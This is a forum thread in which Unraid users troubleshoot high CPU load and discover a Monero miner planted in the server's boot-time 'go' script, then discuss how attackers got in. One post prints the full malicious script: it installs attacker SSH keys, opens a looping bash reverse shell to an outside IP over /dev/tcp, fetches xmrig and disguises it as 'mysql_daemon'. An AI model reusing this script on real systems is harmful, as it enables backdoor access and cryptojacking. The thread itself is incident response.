February 4, 20215 yr Hi all, Recently my server has been maxing out the cpu on all cores on boot. I've tried stopping all docker apps and arrays but the issue persists. Running >top in terminal shows the process is mysql_daemon. Can I shut this process down or is it needed by the OS for something? Edited March 17, 20215 yr by JackDewhurst Updated Title
February 4, 20215 yr Community Expert Go to Tools - Diagnostics and attach the complete Diagnostics ZIP file to your NEXT post in this thread.
February 4, 20215 yr Author Hi trurl, sure here are the diagnostics. server-diagnostics-20210204-1839.zip
February 5, 20215 yr Community Expert 23 hours ago, JackDewhurst said: tried stopping all docker apps and arrays And the few plugins you have I don't think use that so I don't know why it would still be running.
February 5, 20215 yr Author I can kill it with kill -9 pid and it doesn't seem to have any detrimental effect on the system. Will just do this for the time being till I work out what the cause is.
March 17, 20215 yr Author On 2/5/2021 at 3:03 PM, trurl said: And the few plugins you have I don't think use that so I don't know why it would still be running. Just a follow up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! full file contents below: #!/bin/bash # Start the Management Utility /usr/local/sbin/emhttp & mkdir /root/.ssh chmod 700 /root/.ssh cp /boot/config/ssh/authorized_keys /root/.ssh/ chmod 600 /root/.ssh/authorized_keys nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6> cd /dev/shm wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li> tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz cd xmrig-6.7.0/ mv xmrig /usr/bin/mysql_daemon mkdir -p /etc/mysql/conf.d echo '{ "autosave": true, "background": true, "cpu": { "enabled": true, "max-threads-hint": 50 }, "max-cpu-usage": 25, "cpu-priority": 1, "opencl": false, "cuda": false, "pools": [ { "url": "pool.minexmr.com:443", "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB> "keepalive": true, "tls": true } ] }' > /etc/mysql/conf.d/.config.json /usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B rm -r /dev/shm/xmrig-6.7.0 rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc..
March 17, 20215 yr Author I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr Edited March 17, 20215 yr by JackDewhurst
March 17, 20215 yr Community Expert 13 hours ago, JackDewhurst said: I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr Are you sure you have not opened up any inbound ports on your router or put unRaid into the DMZ? Normally a router will block all inbound connections by default.
March 26, 20215 yr Community Expert @JackDewhurst On 3/17/2021 at 8:26 AM, BRiT said: This is why no one should set up their servers to be exposed to the internet. Now that we are more attuned to these sorts of things lately, I went back and looked at OP diagnostics. Here are some excerpts from syslog: Feb 4 10:38:38 Bruce-Willis sshd[1956]: Accepted none for adm from 109.236.89.61 port 10163 ssh2 Feb 4 10:38:38 Bruce-Willis sshd[1957]: Accepted none for adm from 51.77.66.36 port 21574 ssh2 Feb 4 10:38:38 Bruce-Willis sshd[2003]: Accepted none for adm from 89.39.105.84 port 12355 ssh2 Feb 4 10:38:38 Bruce-Willis sshd[2097]: Accepted none for adm from 190.2.144.45 port 44237 ssh2 Feb 4 10:38:43 Bruce-Willis sshd[2371]: Invalid user tech from 196.89.145.142 port 61652 Feb 4 10:38:47 Bruce-Willis sshd[2369]: Failed password for root from 192.42.116.28 port 57396 ssh2 Feb 4 10:38:54 Bruce-Willis sshd[5195]: Accepted none for adm from 194.88.107.164 port 8746 ssh2 Feb 4 10:38:58 Bruce-Willis sshd[4618]: Failed password for root from 77.247.181.163 port 17784 ssh2 Feb 4 10:39:10 Bruce-Willis sshd[6513]: Accepted none for adm from 178.128.95.213 port 60574 ssh2 Feb 4 10:39:10 Bruce-Willis sshd[6254]: Failed password for root from 91.192.103.34 port 38220 ssh2 Feb 4 10:39:28 Bruce-Willis sshd[6724]: Failed password for root from 185.220.102.242 port 15016 ssh2 https://www.abuseipdb.com/check/109.236.89.61 Netherlands https://www.abuseipdb.com/check/51.77.66.36 Germany https://www.abuseipdb.com/check/192.42.116.28 Netherlands https://www.abuseipdb.com/check/77.247.181.163 Netherlands https://www.abuseipdb.com/check/91.192.103.34 Switzerland https://www.abuseipdb.com/check/185.220.102.242 Netherlands
March 26, 20215 yr Community Expert 1 hour ago, jakehaas said: my Unraid machine is also doing the exact same thing @jakehaas Go to Tools - Diagnostics and attach the complete Diagnostics ZIP file to your NEXT post in this thread.
March 26, 20215 yr 9 hours ago, jakehaas said: My home network has no ports forwarded from outside. Unlikely for this to have happened. You've probably at least forwarded 32400 for Plex, but a shortcut people take when they don't understand how to forward a port is to simply place a server within a DMZ... Alternatively, one of your clients has been hijacked
April 8, 20215 yr Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the myservers plug in to work as I had trouble with my Eeros mesh router. my admin account password is very complex as well Edited April 8, 20215 yr by docbrown
April 8, 20215 yr Community Expert 5 minutes ago, docbrown said: Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the myservers plug in to work as I had trouble with my Eeros mesh router. my admin account password is very complex as well Sounds bad if you cannot track down where this is coming from. I would be worried that you have some other device on your local LAN (or your router) compromised and that is the way that the someone is getting into your system. The other issue is how are they getting to the flash drive to change it? Is the flash drive shared on the network so that it can be accessed from another machine/device. I would recommend it is not shared on the network unless needed and definitely do not have it shared as a public share so anyone can change its content.
April 8, 20215 yr 13 minutes ago, itimpi said: Is the flash drive shared on the network… Hmm yes i can access it on the network but it doesn’t appear under the shares tab in the unraid ui Edit: Main tab - Flash durrr Edited April 8, 20215 yr by docbrown
April 8, 20215 yr Community Expert 1 hour ago, docbrown said: Hmm yes i can access it on the network but it doesn’t appear under the shares tab in the unraid ui Edit: Main tab - Flash durrr Click on the flash drive on the Main tab I've often thought to myself that it should also be listed under the Disk Shares part of the Shares tab as that is a more 'discoverable' location.
April 8, 20215 yr Make sure to look at all your extras and plugins on the flash as well as dockers to make sure its not self-reinstalling on shutdown or restarts.
April 10, 20215 yr I think someone mention this before but this is could be the issue. Docker Hub Images With Malicious Monero Money Miners? Edited April 10, 20215 yr by squirrellydw
Archived
This topic is now archived and is closed to further replies.